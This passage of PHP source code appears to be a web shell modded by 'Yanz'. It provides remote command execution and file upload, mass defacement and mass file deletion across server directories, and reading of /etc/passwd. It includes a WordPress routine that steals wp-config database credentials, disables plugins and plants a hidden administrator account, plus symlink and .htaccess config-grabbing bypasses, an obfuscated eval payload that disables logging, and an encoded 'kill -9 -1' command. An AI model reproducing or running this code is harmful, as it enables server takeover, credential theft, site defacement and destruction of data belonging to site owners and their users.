$_GET['dir']); @chdir($dir); } else { $dir = str_replace("\\", "/", getcwd()); } return $dir; } function massdeface($dir, $file, $filename, $type = null) { $scandir = scandir($dir); foreach($scandir as $dir_) { $path = "$dir/$dir_"; $location = "$path/$filename"; if($dir_ === "." || $dir_ === "..") { file_put_contents($location, $file); } else { if(is_dir($path) AND is_writable($path)) { print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."<br>"; file_put_contents($location, $file); if($type === "-alldir") { massdeface($path, $file, $filename, "-alldir"); } } } } } function massdefacesubdir($dir, $dsubdir, $file, $filename, $type = null) { $scandir = scandir($dir); foreach($scandir as $dir_) { $path = "$dir/$dir_"; $pathsubdir = "$path/$dsubdir"; $location = "$path/$dsubdir/$filename"; if($dir_ === "." || $dir_ === "..") { file_put_contents($location, $file); } else { if(is_dir($pathsubdir) AND is_writable($pathsubdir)) { print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."<br>"; file_put_contents($location, $file); if($type === "-alldir") { massdefacesubdir($pathsubdir, $file, $filename, "-alldir"); } } } } } function massdelete($dir, $filename) { $scandir = scandir($dir); foreach($scandir as $dir_) { $path = "$dir/$dir_"; $location = "$path/$filename"; if($dir_ === '.') { if(file_exists("$dir/$filename")) { unlink("$dir/$filename"); } } elseif($dir_ === '..') { if(file_exists(dirname($dir)."/$filename")) { unlink(dirname($dir)."/$filename"); } } else { if(is_dir($path) AND is_writable($path)) { if(file_exists($location)) { print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."<br>"; unlink($location); massdelete($path, $filename); } } } } } function executewpautoedit(){ $Username = "yanz@123457"; $Password = "yanz@123457"; $pass = md5($Password); $title = htmlspecialchars($_POST['title']); $id = $_POST['id']; $content = $_POST['content']; $postname = $_POST['name']; function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION,true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\r\n", $_POST['link']); foreach($link as $dir_config) { $config = anucurl($dir_config); preg_match("/define.*DB_NAME.*\"(.*)\"/", $config, $m); $dbname1 = $m[1]; preg_match('/define.*DB_NAME.*\'(.*)\'/', $config, $m); $dbname2 = $m[1]; $dbname = ("$dbname1$dbname2"); preg_match("/define.*DB_USER.*\"(.*)\"/", $config, $m); $dbuser1 = $m[1]; preg_match('/define.*DB_USER.*\'(.*)\'/', $config, $m); $dbuser2 = $m[1]; $dbuser = ("$dbuser1$dbuser2"); preg_match("/define.*DB_PASSWORD.*\"(.*)\"/", $config, $m); $dbpass1 = $m[1]; preg_match('/define.*DB_PASSWORD.*\'(.*)\'/', $config, $m); $dbpass2 = $m[1]; $dbpass = ("$dbpass1$dbpass2"); preg_match("/define.*DB_HOST.*\"(.*)\"/", $config, $m); $dbhost1 = $m[1]; preg_match('/define.*DB_HOST.*\'(.*)\'/', $config, $m); $dbhost2 = $m[1]; $dbhost = ("$dbhost1$dbhost2"); preg_match("/\\\$table_prefix.+?\"(.+?)\".+/", $config, $m); $dbprefix0 = $m[1]; $dbprefix1 = HEx($config,"table_prefix = '","'"); $dbprefix2 = HEx($config,"table_prefix = '","'"); $dbprefix3 = HEx($config,"table_prefix= '","'"); $dbprefix4 = HEx($config,"table_prefix = '","'"); $dbprefix = ("$dbprefix0$dbprefix1$dbprefix2$dbprefix3$dbprefix4"); $connect = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname); if ($connect) { $query1 = mysqli_query($connect, "select * from " . $dbprefix . "options where option_name='siteurl'"); while ($siteurl = mysqli_fetch_array($query1)) { $site_url = $siteurl['option_value']; } $query3 = mysqli_query($connect, "update " . $dbprefix . "options set option_value='a:0:{}' where option_name='active_plugins'"); // $query2 = mysqli_query($connect, "update " . $dbprefix . "users set user_login='$Username',user_pass='$pass' where id='1'"); $sql = "insert into $dbprefix"."users(user_login,user_pass,user_nicename,user_email,user_registered,user_activation_key,user_status,display_name) values('$Username', '$pass', '$Username', 'loggershell443@gmail.com', '2020-04-21 06:42:46', '', '0', '$Username');"; $query2 = mysqli_query($connect, $sql); $sql = "select ID from $dbprefix"."users where user_login='$Username';"; $query2 = mysqli_query($connect, $sql); $row = mysqli_fetch_array($query2); $id = $row['ID']; $sql = "insert into $dbprefix"."usermeta(user_id, meta_key, meta_value) values($id, '$dbprefix"."capabilities', 'a:1:{s:13:\"administrator\";b:1;}');"; $query2 = mysqli_query($connect, $sql); $sql = "select * from $dbprefix"."users where user_login='$Username';"; $query2 = mysqli_query($connect, $sql); $row = mysqli_fetch_array($query2); if ($query2) { echo "<center><span class=f>URL : <a href='$site_url/wp-login.php' target='_blank'>$site_url/wp-login.php</a><br><br>UserName : <font color='#ff9933'>$Username</font><br><br>Password : <font color='#ff9933'>$Password</font><br><br></span></center>"; } } } } function wpautoedit1(){ echo ' <html><head><title>Wordpress Mass User Add MOD BY YANZ</title><style type="text/css"> body { background-color:#000000; background-image:url("https://i.imgur.com/hLcQCBx.gif"); background-repeat:repeat; margin-top:20px; font-family:"Agency FB"; font-size:12pt; color:#ffffff; } input,textarea,select{ font-weight: bold; color: #cccccc; dashed #ffffff; border: 1px solid #2C2C2C; background-color: #080808 } a { background-color: #151515; vertical-align: bottom; color: #d0c8c8; text-decoration: none; font-size: 20px; margin: 8px; padding: 6px; border: thin solid #000000; } a:hover { background-color: #080808; vertical-align: bottom; color: #333; text-decoration: none; font-size: 20px; margin: 8px; padding: 6px; border: #d53b3b; } .style1 { text-align: center; color: #d9910e; } .style2 { color: #d9910e; font-weight: bold; } .style3 { color: #d9910e; } textarea{ background:transparent; border: 1px solid #2d2b2b; width: 80%; height: 400px; padding-left: 5px; margin: 10px auto; font-family:Homenaje; color: #ffffff; font-size:13px; } </style></head> '; function GrabUrl($url,$type){ $urlArray = array(); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); $regex='|<a.*?href="(.*?)"|'; preg_match_all($regex,$result,$parts); $links=$parts[1]; foreach($links as $link){ array_push($urlArray, $link); } curl_close($ch); foreach($urlArray as $value){ $lol="$url$value"; if(preg_match("#$type#is", $lol)) { echo "$lol\r\n"; } } } function HEx($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } echo "<center> <font color='white' size='40'>Wordpress Mass User Add MOD BY YANZ</font> <table width='100%' cellspacing='0' cellpadding='0' class='tb1' > <td height='10' align='left' class='td1'></td></tr><tr><td width='100%' align='center' valign='top' rowspan='1'><font color='red' face='comic sans ms'size='1'><b> <font color=#ff9933> </font><br><font color=white>--==[[Greetz to]]==--</font><br><font color=#ff9933>-=| HEx |=-<br> </table> </table> <div align=center><font color=#ff9933 font size=5><marquee behavior='scroll' direction='left' scrollamount='2' scrolldelay='5' width='70%'><p> <span class='footerlink'> ####### Moded By Yanz #######</span> </marquee><br><br></font></div> <form method='post'> Link Config: <br> <input type='text' name='linkconf' height='10' size='50' placeholder='http://url.com/priv8_sym404/'><br><br> <input type='submit' style='width: 150px;' name='gass' value='Submit!!'> </form></center>"; } function terminalv2(){ echo '<html>'; echo "<title>Yanz WSO Shell</title>"; echo "<body bgcolor=#000000>"; echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>'; $safe_mode = @ini_get('safe_mode'); if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";} echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>"; echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>"; echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />"; echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@alfaGetCwd()) . "/<br />"; echo "<b style='color: #7CFC00'>Safe Mode : $r<br>"; echo"<font color=#7CFC00>Disable functions : </font>"; $disfun = @ini_get('disable_functions'); if(empty($disfun)){$disfun = '<font color="green">NONE</font>';} echo"<font color=red>"; echo "$disfun"; echo"</font><br>"; echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>"; echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>"; echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@alfaGetCwd()).'/" size="59"><p><input type="file" name="fileterminalv2" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>'; if(isset($_FILES['fileterminalv2'])){ if(@move_uploaded_file($_FILES['fileterminalv2']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['fileterminalv2']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; } else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; } } echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form> <hr><pre>'; if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';'; $solevisible = "cd '".addslashes(str_replace("\\","/",@alfaGetCwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']); echo alfaEx($solevisible); echo'</pre> </body></html>'; exit;} if($_POST['gass']) { wpautoedit1(); echo "<center> <form method='post'> Link Config: <br> <textarea name='link'>"; GrabUrl($_POST['linkconf'],'wordpress'); echo"</textarea><br><br> <input type='submit' style='width: 200px;' name='edittitle' value='Submit!!'> </form></center>"; exit; }if($_POST['edittitle']) { wpautoedit1(); executewpautoedit(); exit; } if(isset($_POST['command_solevisible'])){ terminalv2(); } if(isset($_FILES['fileterminalv2'])){ terminalv2(); if(@move_uploaded_file($_FILES['fileterminalv2']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['fileterminalv2']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; } else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; } } eval(gzinflate(base64_decode('UynOzE2FwezU7OxsWwWV+AD/4JBo9YLE4uLy/KIU9Vg9JYUaBSU9ZIni/KISrBLlQPXWAA==')));if(fUnctIOn_EXiSTS("i\x6ei_set")){@iNi_set("error_log",null);@inI_sEt("log_error\x73",(int)round(0+0+0));@Ini_set("max\x5fexecutio\156\137tim\x65",01153-01153);}if(fUNCTiOn_ExIsTs("set_magic_quotes\x5frunti\155e")){if(vErsiOn_cOmpaRe(phPVersIon(),"5.4.0","<"))magic_quotes_runtime((int)round(0+0+0));}class _pps{public$hsh;public$_i;public$_taj;public$_hej;public$_cp;public$_za;public$_zrt;public$_wda;public$_vpb;public$_vor;function seTCoOk($_gtq,$_e){$_COOKIE[$_gtq]=$_e;SeTcOOkie($_gtq,$_e);}function afterlogiN(){$this->hsh="fa704e7366d666bd";$this->_i="_".sUbSTr(mD5($_SERVER["HTTP_HOST"]),-056- -0152-074,075+0146+-0240);$this->_taj="#d\1465";$this->_hej="Windows-1251";if(!@isset($_COOKIE[$this->_i])||($_COOKIE[$this->_i]!=$this->hsh))$this->SetcOoK($this->_i,$this->hsh);}function sTArTUP(){if(FUNCTION_exiSTS("ini_\x67et")){$_vpb=@INI_geT("safe_mode");$_cp=@INi_geT("disable_functions");}if(!$_vpb&&FUNCTion_ExiSts("error_r\145p\x6f\x72ting"))ERRoR_rePoRTINg((int)round(0+0));if(!$_vpb&&FUnCTIOn_ExIsTs("\163et_ti\155e_limit"))seT_tIME_limit((int)round(0+0));if(fUNctIoN_eXiSTs("g\x65t_magic_\161uote\163\x5fg\160c")&&fuNCTIon_ExIStS("ar\x72ay\137m\x61\x70")&&fUNcTiOn_eXiSts("s\x74ripslas\x68es")&&funCTion_exIstS("is_ar\162ay")){if(@GeT_maGIC_quOtEs_gPC()){function WSS($_a){return @Is_arraY($_a)?@ArRAY_MAp("WSS",$_a):@STRIPslAshEs($_a);}$_POST=WSs($_POST);$_COOKIE=wss($_COOKIE);}}if(!FUnCtiON_EXIsts("posix_getpwuid")&&(StrPOS($_cp,"\160osix_ge\164\160wuid")===false)){function pOSiX_GeTpwUid($_l){return false;}}if(!FUncTIoN_ExisTS("posix\137getgr\147id")&&(StRPos($_cp,"p\157\x73ix_getgrgid")===false)){function POsIx_GetgRgid($_l){return false;}}if(StRtOlowER(suBSTr(PHP_OS,01200+-01200,(int)round(1.5+1.5)))=="win")$_vor="w\151\156";else $_vor="nix";$_wda=$_SERVER["\104O\x43UMENT_R\117OT"];if(FUnctiOn_exIStS("getcwd"))$_zrt=@GeTcwD();else $_zrt=@DIRname(__FILE__);if(isset($_POST["c"])&&$_POST["\143"]!="")$_POST["c"]=STR_ROt13($_POST["c"]);if(isset($_POST["c"])){if(FunCTion_EXisTs("ch\x64ir"))@CHDir($_POST["c"]);}if(FuNCtION_eXiSTS("g\x65tcwd")){$_za=@GeTcwd();}elseif(@isset($_POST["c"])&&$_POST["c"]!="")$_za=$_POST["c"];else $_za=$_zrt;if($_vor=="w\151\156"){$_zrt=Str_REPlAcE("\134","/",$_zrt);$_za=StR_rEplaCE("\134","/",$_za);}if($_za[Strlen($_za)-(0577- -0621-01417)]!="/")$_za.="/";$this->_cp=$_cp;$this->_za=$_za;$this->_zrt=$_zrt;$this->_wda=$_wda;$this->_vpb=$_vpb;$this->_vor=$_vor;} function vhost(){echo '<h2>Vhost Yanz Mod</h2><form method="post"> <p style="color: black" > DIR Home 1: </p><input type="text" value= "/xxx/" name="file_name1"><br>'; echo '<p style="color: black" > DIR Home 2: </p><input type="text" value= "/xxx/" name="base_dir1"><br>'; echo "<br><br>Your Base Dir : <input type='text' name='base_dir' size='50' value='".getcwd ()."'><br><br>"; echo '<input style="color:red;background-color:#FFFF" name="vhost" size="10" value="./Star Vhost" type="submit"> <br/><br/></form>';} function symlink(){echo'<div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;></div><br> <form method="post"> <center> <div style="text-align: center;"><big><span style="height: 0px;"><big style="font-family: AR CENA;"><span style="height: 0px;"><small><span style="height: 0px;"><span style="widows: 2; text-transform: none; text-indent: 0px; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0, 0, 0); word-spacing: 0px; font-style: normal; font-variant: normal; font-weight: 700;" class="Apple-style-span"><span style="widows: 2; text-transform: none; text-indent: 0px; font-style: normal; font-variant: normal; font-weight: normal; font-size: medium; line-height: normal; font-size-adjust: none; font-stretch: normal; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0, 0, 0); word-spacing: 0px;" class="Apple-style-span"><span style="widows: 2; text-transform: none; text-indent: 0px; font-style: normal; font-variant: normal; font-weight: normal; font-size: medium; line-height: normal; font-size-adjust: none; font-stretch: normal; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0, 0, 0); word-spacing: 0px;" class="Apple-style-span"><font color="white" size="6"><big><span style="font-weight: bold; text-shadow: white 0px 0px 12px; color: white;"><span lang="en-us"><span style="color: rgb(112, 0, 0);"># Bypass</span> <span style="color: rgb(112, 0, 0);">Sym Yanz Mod 403 !!<br><small><small><small><small><span style="color: white;">./</span></small></small></small></small><br></span></span></span></big></font></span></span></span><span style="widows: 2; text-transform: none; background-color: rgb(0, 0, 0); text-indent: 0px; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0, 0, 0); word-spacing: 0px; font-style: normal; font-variant: normal; font-weight: 700;" class="Apple-style-span"><span style="widows: 2; text-transform: none; background-color: rgb(0, 0, 0); text-indent: 0px; font-style: normal; font-variant: normal; font-weight: normal; font-size: medium; line-height: normal; font-size-adjust: none; font-stretch: normal; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0, 0, 0); word-spacing: 0px;" class="Apple-style-span"><span style="widows: 2; text-transform: none; text-indent: 0px; font-style: normal; font-variant: normal; font-weight: normal; font-size: medium; line-height: normal; font-size-adjust: none; font-stretch: normal; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0, 0, 0); word-spacing: 0px; background-color: rgb(0, 0, 0);" class="Apple-style-span"><font color="white" size="2"><big><span style="font-weight: bold; text-shadow: white 0px 0px 12px; color: white;"><span lang="en-us"> <center><textarea style="color: black";background-color:#0000" cols="66" name="passwd" rows="18">'; $uSr=file("/etc/passwd"); foreach($uSr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } echo system('ls /var/mail'); echo system('ls /home'); echo'</textarea><br> <p style="color: black" > DIR Home 1: </p><input type="text" value= "xxx" name="file_name"><br> <p style="color: black" > DIR 2: </p><input type="text" value= "xxx" name="base_dir"><br> <p style="color: black" > .htaccess : </p> <select name="achon666ju5t"> <option title="biasa" value="Options Indexes FollowSymLinks DirectoryIndex achon666ju5t.extremecrew AddType txt .php AddHandler txt .php">Apache 1</option> <option title="Apache" value="Options all Options +Indexes Options +FollowSymLinks DirectoryIndex achon666ju5t.extremecrew AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any">Apache 2</option> <option title="Litespeed" value=" Options +FollowSymLinks DirectoryIndex achon666ju5t.extremecrew RemoveHandler .php AddType application/octet-stream .php ">Litespeed</option> </select> <input style="color:red;background-color:#FFFF" name="conf" size="10" value="./Star 403" type="submit"> <br/><br/></form>'; echo "<br><br><p style='color: black' > Your Base Dir : </p><input type='text' name='base_dirxx' size='50' value='".getcwd ()."'><br><br>";} function masfix(){ echo "<title>Mass Defacer - By YANZZ METHOD READ</title>"; echo "<link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>"; echo "<body bgcolor='black'><font color='white'><font face='Electrolize'>"; echo "<center><form method='POST'>"; echo "<div class='text-center'> <h2>Tipe Mass Yanz :</h2> <input id='toggle-off' class='toggle toggle-left' name='tipe' value='murah' type='radio'> <label for='toggle-off' class='butn'>Biasa</label> <input id='toggle-off' class='toggle toggle-right' name='tipe' value='publichtml' type='radio'> <label for='toggle-off' class='butn'>Public_html Mass</label> <input id='toggle-off' class='toggle toggle-right' name='tipe' value='customsubdir' type='radio'> <label for='toggle-off' class='butn'>Custom subdir Mass</label> <input id='toggle-off' class='toggle toggle-left' name='tipe' value='murahold' type='radio'> <label for='toggle-off' class='butn'>Biasa Old</label> <input id='toggle-off' class='toggle toggle-right' name='tipe' value='publichtmlold' type='radio'> <label for='toggle-off' class='butn'>Public_html Mass Old</label> <input id='toggle-off' class='toggle toggle-right' name='tipe' value='customsubdirold' type='radio'> <label for='toggle-off' class='butn'>Custom subdir Mass Old</label> </div> "; echo "Base Dir : <input type='text' name='base_dir' size='50' value='".getcwd ()."'><br><br>"; echo "File Name : <input type='text' name='file_name' value='index.php'><br><br>"; echo "Custom Subdir : <input type='text' name='sub_name' value='wordpress/ or public/ Dll'><br><br>"; echo "file mass : <input type='text' name='defpageD' value='".getcwd ()."'><br><br>"; echo "<h2>For Mass old input</h2><br>"; echo "<h4>Jika pakai method bukan old kosongkan saja</h4><br>"; echo "Your Index : <br><textarea style='width: 685px; height: 330px;' name='index'>//Put Your Index Here</textarea><br>"; echo "<input type='submit' value='Mass'></form></center>"; } function massindox(){ print" <link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'> <body bgcolor='black'><font color='white'><font face='Electrolize'> <center><form method='post'> <font style='text-decoration: underline;'>Tipe Sabun IndoXploit:</font><br> <input type='radio' name='mass_type' value='singledir' checked>Mass Deface Single Directory<input type='radio' name='mass_type' value='alldir'>Mass Deface All Directory<input type='radio' name='mass_type' value='delete'>Mass Delete File<input type='radio' name='mass_type' value='massubdir'>Mass Sub Directory<br> <span>( kosongkan 'Index File' jika memilih Mass Delete File )</span><br><br> <font style='text-decoration: underline;'>Folder:</font><br> <input type='text' name='d_dir' value='".path()."' style='width: 450px;' height='10'><br><br> <font style='text-decoration: underline;'>Filename:</font><br> <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br><br> <font style='text-decoration: underline;'>Custom Sub Dir:</font><br> <input type='text' name='dsubdir' value='wordpress public dll' style='width: 450px;' height='10'><br><br> <font style='text-decoration: underline;'>Index File:</font><br> <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br> <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px; margin: 5px auto;' type='submit' name='startindox' value='Mass'> </form></center>"; } function masshta(){ echo "<title>Mass Htacces Yanz</title>"; echo "<link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>"; echo "<body bgcolor='black'><font color='white'><font face='Electrolize'>"; echo "<center><form method='POST'>"; echo "<div class='text-center'> <h2>HTACCESS MASSAL FIXER TOOLS YANZ</h2> <h5>Tipe :</h5> <input id='toggle-on' class='toggle toggle-left' name='tipemasshta' value='notalldir' type='radio' checked> <label for='toggle-on' class='butn'>Not ALL DIRS</label> <input id='toggle-off' class='toggle toggle-right' name='tipemasshta' value='alldir' type='radio'> <label for='toggle-off' class='butn'>MASS ALL DIRS</label> <input id='toggle-off' class='toggle toggle-right' name='tipemasshta' value='customdir' type='radio'> <label for='toggle-off' class='butn'>Custom Sub Directory</label> </div> "; echo "Base Dir : <input type='text' name='base_dir' size='50' value='".getcwd ()."'><br><br>"; echo "Custom Subdir : <input type='text' name='sub_name' value='/wordpress/ or /public/ Dll'><br><br>"; echo "<input type='submit' value='Gass'></form></center>"; } function masdelete(){ echo "<font face='Electrolize'>"; echo "<font color='white'><h1>MASS DELETE BY YANZ</h1>"; echo "<title>Mass Delete - By YANZZ</title>"; echo "<link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>"; echo "<body bgcolor='black'><font face='Electrolize'>"; echo "<font color='white'>"; echo "<form method='post'> <h5>$imgfol Lokasi :</h5> <input type='text' name='d_dir' value='".getcwd ()."' class='form-control'><br/> <h5>$imgfile Nama File :</h5> <input type='text' name='d_file' placeholder='[Ex] index.php' class='form-control'><br/> <input type='submit' name='start' value='Delete!!' class='btn btn-danger form-control'></form>"; } function wpautoedit(){ echo ' <html><head><title>Wordpress Mass User Add MOD BY YANZ</title><style type="text/css"> body { background-color:#000000; background-image:url("https://i.imgur.com/hLcQCBx.gif"); background-repeat:repeat; margin-top:20px; font-family:"Agency FB"; font-size:12pt; color:#ffffff; } input,textarea,select{ font-weight: bold; color: #cccccc; dashed #ffffff; border: 1px solid #2C2C2C; background-color: #080808 } a { background-color: #151515; vertical-align: bottom; color: #d0c8c8; text-decoration: none; font-size: 20px; margin: 8px; padding: 6px; border: thin solid #000000; } a:hover { background-color: #080808; vertical-align: bottom; color: #333; text-decoration: none; font-size: 20px; margin: 8px; padding: 6px; border: #d53b3b; } .style1 { text-align: center; color: #d9910e; } .style2 { color: #d9910e; font-weight: bold; } .style3 { color: #d9910e; } textarea{ background:transparent; border: 1px solid #2d2b2b; width: 80%; height: 400px; padding-left: 5px; margin: 10px auto; font-family:Homenaje; color: #ffffff; font-size:13px; } </style></head> '; $pass = md5($Password); function GrabUrl($url,$type){ $urlArray = array(); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); $regex='|<a.*?href="(.*?)"|'; preg_match_all($regex,$result,$parts); $links=$parts[1]; foreach($links as $link){ array_push($urlArray, $link); } curl_close($ch); foreach($urlArray as $value){ $lol="$url$value"; if(preg_match("#$type#is", $lol)) { echo "$lol\r\n"; } } } function HEx($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } echo "<center> <font color='white' size='40'>Wordpress Mass User Add MOD BY YANZ</font> <table width='100%' cellspacing='0' cellpadding='0' class='tb1' > <td height='10' align='left' class='td1'></td></tr><tr><td width='100%' align='center' valign='top' rowspan='1'><font color='red' face='comic sans ms'size='1'><b> <font color=#ff9933> </font><br><font color=white>--==[[Greetz to]]==--</font><br><font color=#ff9933>-=| HEx |=-<br> </table> </table> <div align=center><font color=#ff9933 font size=5><marquee behavior='scroll' direction='left' scrollamount='2' scrolldelay='5' width='70%'><p> <span class='footerlink'> ####### Moded By Yanz #######</span> </marquee><br><br></font></div> <form method='post'> Link Config: <br> <input type='text' name='linkconf' height='10' size='50' placeholder='http://url.com/priv8_sym404/'><br><br> <input type='submit' style='width: 150px;' name='gass' value='Submit!!'> </form></center>"; } function kill(){ $input = 'a2lsbCAtOSAtMQ=='; if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';'; $solevisible = "cd '".addslashes(str_replace("\\","/",@alfaGetCwd()))."'".$separator."".__ZGVjb2Rlcg($input); alfaEx($solevisible); } function terminalv2(){ echo '<html>'; echo "<title>Yanz WSO Shell</title>"; echo "<body bgcolor=#000000>"; echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>'; $safe_mode = @ini_get('safe_mode'); if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";} echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>"; echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>"; echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />"; echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@alfaGetCwd()) . "/<br />"; echo "<b style='color: #7CFC00'>Safe Mode : $r<br>"; echo"<font color=#7CFC00>Disable functions : </font>"; $disfun = @ini_get('disable_functions'); if(empty($disfun)){$disfun = '<font color="green">NONE</font>';} echo"<font color=red>"; echo "$disfun"; echo"</font><br>"; echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>"; echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>"; echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@alfaGetCwd()).'/" size="59"><p><input type="file" name="fileterminalv2" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>'; echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form> <hr><pre>'; echo'</pre> </body></html>'; exit;} function sym404(){ echo' <style> input[type=submit] { padding:2px 7px; background:#ffb101bd; color:#fff; border:0 none; cursor:pointer; -webkit-border-radius: 5px; border-radius: 5px; } </style>'; echo "<center><h2>Symlink 404 Yanz</h2></center><center>"; echo "<form method=\"post\" action=\"\"><center> </select><br><textarea name=\"passwd\" class='area' rows='20' cols='100'> "; echo include ("/etc/passwd"); echo "</textarea><br><br> <select class=\"select\" name=\"configxx\" style=\"width: 200px;\" height=\"10\"> <option value=\"404\">Config 404</option> <option value=\"grab\">Config Grab</option> <option value=\"symlink\">Symlink Config</option> <option value=\"symvhosts\">Vhosts Config Grabber</option><br><br><input type=\"submit\" value=\"Submit!!\"></td></tr> </form></center> "; } function readdomains(){ $table_header = "<center><h2>Read Domain Yanz</h2></center> <pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table style='background-color:#000000' id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#FFFFFF;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b>"; if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){ echo "<center>"; $lines = array(); $anony_domains = array(); $anonymous_users = array(); $f_black = array(); $error = false; $anonymous = false; $makepwd = "/home/{user}/public_html/"; $domains = alfaGetDomains(); $lines = $domains["lines"]; $state = $domains["state"]; $is_posix = function_exists("posix_getpwuid") && function_exists("fileowner"); $can_runcmd = _alfa_can_runCommand(false,false); if(!$is_posix && !$can_runcmd){ $anonymous = true; $anony_domains = 